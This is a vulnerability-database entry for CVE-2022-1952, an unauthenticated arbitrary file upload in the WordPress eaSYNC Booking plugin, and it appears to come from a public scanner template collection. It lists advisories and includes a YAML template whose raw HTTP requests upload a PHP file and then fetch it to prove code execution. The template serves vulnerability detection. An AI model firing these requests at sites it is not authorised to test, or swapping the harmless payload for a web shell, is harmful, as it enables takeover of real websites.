| Reporter | Title | Published | Views |
|---|---|---|---|
| attackerkb | CVE-2022-1952 | 11 Jul 2022 13:15 | - |
| circl | CVE-2022-1952 | 30 Jun 2022 09:48 | - |
| cnnvd | WordPress plugin Free Booking Plugin for Hotels, Restaurant and Car Rental Code Issue Vulnerability | 11 Jul 2022 00:00 | - |
| cnvd | WordPress Hotels/Restaurant/Car Rental Free Booking plugin Arbitrary File Upload Vulnerability | 13 Jul 2022 00:00 | - |
| cve | CVE-2022-1952 | 11 Jul 2022 12:56 | - |
| cvelist | CVE-2022-1952 eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload | 11 Jul 2022 12:56 | - |
| nvd | CVE-2022-1952 | 11 Jul 2022 13:15 | - |
| osv | CVE-2022-1952 | 11 Jul 2022 13:15 | - |
| patchstack | WordPress eaSYNC plugin <= 1.1.15 - Unauthenticated Arbitrary File Upload vulnerability | 15 Jun 2022 00:00 | - |
| prion | Input validation | 11 Jul 2022 13:15 | - |

```yaml
id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.17572
    epss-percentile: 0.96762
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev,vuln

variables:
  string: "CVE-2022-1952"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        --------------------------98efee55508c5059--
      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true
# digest: 4a0a0047304502202428917bee934978708bb93be5de812f10d928328cf771c3f8971921fec3163a022100850d278a40cd1e915150e50077f07cc7f8c2ba68490aeedf6ee1bd184f1f83d0:922c64590222798bb761d5b6d8e72950
```